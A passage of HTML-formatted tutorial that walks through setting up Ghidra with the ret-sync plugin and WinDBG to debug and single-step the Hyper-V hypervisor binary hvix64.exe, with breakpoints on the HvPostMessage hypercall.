baseline;">File</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">New project</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. Non shared project. Set project directory and project name. Folder with project name and gpr-file will be created in project directory (if folder exist, you see message at bottom).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 174px; overflow: hidden; width: 428px;"><img height="174" src="https://lh4.googleusercontent.com/drLgBoemIeb2Lypp9fwoESn6NkN8_ucsYinvMB5H-mFNkN78mUDc_Hu1eDx4YxxOlovWCXtJh4SmuEVrRkc1tMj7lTmhxxHqQqAJtoDzJnKtoAKpvIK_tdtVAzs20KvKw4fIcAuVvIlUTyQ8aw" style="margin-left: 0px; margin-top: 0px;" width="428" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Press </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">CodeBrowser</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> icon. </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 130px; overflow: hidden; width: 94px;"><img height="130" src="https://lh3.googleusercontent.com/xGuLci4YuYKNX8N4vdj0b5lSjQHlIC1y1zhONBJQhNAnUQLT1QkdXYjy6Suvy80BxXq_7n36yNGzI1Lc1O4tMvruF83BO1PYY9jLvVeNM55Jec10qQ8A1cMRzL-jrKB0b_4OFUBDCJ3fGM92Qw" style="margin-left: 0px; margin-top: 0px;" width="94" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You see message with </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">retsync</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> plugin settings request:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 251px; overflow: hidden; width: 478px;"><img height="251" src="https://lh5.googleusercontent.com/TMA_FPPiKMsst9UJSVS-gMNEgW1cQ-UPu2MDo-G2jLqIR5zVd0EHWw-zW7JfgL5DEeSxoi2zg6kzfXzPmZ-z3wGW8yYY212iWzt5ugBIONSkh_8iGVvSGB1pvl-5YuY-6f4GJaPMAtI2njwBkg" style="margin-left: 0px; margin-top: 0px;" width="478" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Press </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">OK</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, and you see empty Ghidra project windows. Load hvix64.exe file using </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">File</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Import file</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 187px; overflow: hidden; width: 401px;"><img height="187" src="https://lh3.googleusercontent.com/ate6mOhpGQwTzOkGoWtWXWkz7pAmb1U-AE-hGmqxN5jo5CEGvjN-1MkKL5lPb_8Hku0xwrswYZ6WwVzjPt9t7Pa6BUSwv7dJe0b-14TK8kqgVUqq6qFWk5lPjR4CdRPQ8UZkcSATNBv1c1VIlA" style="margin-left: 0px; margin-top: 0px;" width="401" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">6.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Press </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">OK</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. File will be imported. Next you see question about analysis. Press “Yes”</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 281px; overflow: hidden; width: 390px;"><img height="281" src="https://lh4.googleusercontent.com/saGDLDeXHfa3iDdecS5WRTH-lKELyD-HcYmPnzjsWluJf0zU5WLfFzDk3oaGkEo2zcZ47gLIxkbS94kvwrx6HE0UsQsU_vhwpaYe6QdTLfH2W0pt6dVorE2zX_8Ec8DXKyi2antVdjP6h_HEZA" style="margin-left: 0px; margin-top: 0px;" width="390" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can try “Aggressive instruction finder” (hypervisor contains much of different code chunks, that can’t be catched during control flow graph analysis)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 120px; overflow: hidden; width: 301px;"><img height="120" src="https://lh5.googleusercontent.com/JlFqQLvgEp5JROhuune0humL6KT7wsb7zOPFngqgn350ulittxBFP00PFr-5jEhx1-iB_SC-X4dWHe17Hzg_vXWJNyn8rUOJzs07HLvakk7YpbdlM3nmmPALPZXyS9tlpTltdNurGpeHcxBGBQ" style="margin-left: 0px; margin-top: 0px;" width="301" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Press </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">OK</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Current progress state you can see at right bottom corner:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 38px; overflow: hidden; width: 331px;"><img height="38" src="https://lh4.googleusercontent.com/1UrIM-LFiVG_lKmn_wnTS63wQHIfGP34jagC7d76sbd1hgJFegbla8BdbCRHtABKKhwEhxUJP6CWbmMYmR06BIKX_EQC_qVy-nzCzGgln5waBLazV8SplrpAE-aOkT7a8cu2CZlnWaukxKw2zg" style="margin-left: 0px; margin-top: 0px;" width="331" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">7.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next you see message about not-presented hvix64.pdb file. Press Ok – symbols really is not present.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">8.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Press Alt+S for </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">retsync</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> enabling and you see message (ret-sync enable, server listening, server started)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.4pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 113px; overflow: hidden; width: 214px;"><img height="113" src="https://lh6.googleusercontent.com/llnEL2LzXdB7PZ67XuN7leK0Dhj7AcogKzt_3PqYp8SLI4aTDY8WJxwfBQyYNI5rJipuwdh9PHNJRYMFt1TggPDoEkRAKErP4BSfOtlS8Z_CagYO-uJ-MRGi0kDLPrOGcTVgRUAVSly_JqE54w" style="margin-left: 0px; margin-top: 0px;" width="214" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">9.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Attach WinDBG to Hyper-V (for example, over network) and load retsync plugin:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">.load @”C:\hv_debugging\sync.dll”</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">!sync</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 76px; overflow: hidden; width: 253px;"><img height="76" src="https://lh6.googleusercontent.com/q_tMr3_SAR7QVVZQWSoGslyZCShIlF3GVDiMlyyUqrRJRAqYGDCPXawTLZiZPzkcwDHixuFhlTZwMTmaBK3wge7XXh7MitbP14QSMbqXfyInlQ0QO7NJDe3in6GF1FNfN6bMxcst0wLqDkqjcQ" style="margin-left: 0px; margin-top: 0px;" width="253" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You get messages in Ghidra console window:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 36px; overflow: hidden; width: 425px;"><img height="36" src="https://lh5.googleusercontent.com/7dW3hw58URQ8vxNCdmTRIAqFhby8Xgdx-EwLoaAZ_KttMtp4Y9K615PWTdyj9JjfH-0BlyUN_Wm-LTPMVfx_gmmrZFi1w28OBGxht9d9c9d7MBbJBtIMiNPu_Ll1WmUXIrP2PQDqq7EnnKWoUQ" style="margin-left: 0px; margin-top: 0px;" width="425" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In WinDBG you can see simple single step output:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 167px; overflow: hidden; width: 373px;"><img height="167" src="https://lh5.googleusercontent.com/b_3YDJ61F_ugeA5DqmNvyL1W9uwm5zveGOehavVAjL1QHYmultH0udl5L2axLfG5KI_Qkd_zPwCL_Aa4ELQSSdfpGqPlJfKll2kdlAT13_8Gv4ZGG0TkV9urkx_dBxTnXJqdEse4uLNkHy8zxQ" style="margin-left: 0px; margin-top: 0px;" width="373" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I set breakpoint on HvPostMessage hypercall (</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">F2</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) and press go (</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">F5</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">), bp was triggered in WinDBG and was synced with Ghidra.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next made some singlsteps (</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">F10</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 235px; overflow: hidden; width: 428px;"><img height="235" src="https://lh5.googleusercontent.com/QLpSAn4O5mdvJylb9VzXI-MrWRrPqJC0rxM9kCRYYONY0PoAgS2qG9JWXtfHFrghVzV8uUGUakmHXne7nE3rSBnHVhUUTf-tLlz8bTIkLugZ9YD1jSS5H3jZlyGkYcs3SgwCI0IlfjwUVi-UMA" style="margin-left: 0px; margin-top: 0px;" width="428" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">retsync</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> shortcuts (from plugin settings):</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 183px; overflow: hidden; width: 445px;"><img height="183" src="https://lh5.googleusercontent.com/cIWS0y_UJCFUm3ncGf99f0qqAOY1YN_nbUojYuwrqDD01kFKUwo_kTxfzJ1J7QzUQN6YvOJEoovNGY8RzL-VcmN4RWOudzk2XyqKO1nggKNiNyyJQkTOKt3ka8353Fn2BRb_-ADsw8lxhjH16A" style="margin-left: 0px; margin-top: 0px;" width="445" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">retsync</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> settings (from radare2 official github.com page) </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 240px; overflow: hidden; width: 366px;"><img height="240" src="https://lh4.googleusercontent.com/lR2kZNj4qezBgVkTpDPr8j-DlFOQV7gcExKuZb0lq9DOtvoBeNsLneyft5mEYflxdCYlbBbOAD06WBqeFaD-gfqQcuiZExO9zSVD_-Pq0uqsucHXXee53xGwtaRymOaAYES67kjIusM0fyv9tw" style="margin-left: 0px; margin-top: 0px;" width="366" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinDBG sync plugin:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 208px; overflow: hidden; width: 366px;"><img height="208" src="https://lh4.googleusercontent.com/iRyMdRpVANoNIoRADFxQE6K4vSZTD38ROge-qLZcTlQQB0Mkv8yXma3hWQ7CVF-tNCQk0ZgtId0hDkid0X1GjEuoNUnS9vZvrm6J0QJZnt1oLwQjga1UCimDXtSKInyB7WJ9bCM6X-jqdwCzhw" style="margin-left: 0px; margin-top: 0px;" width="366" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can export symbols from IDA PRO using Fake PDB plugin and import it Ghidra database.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 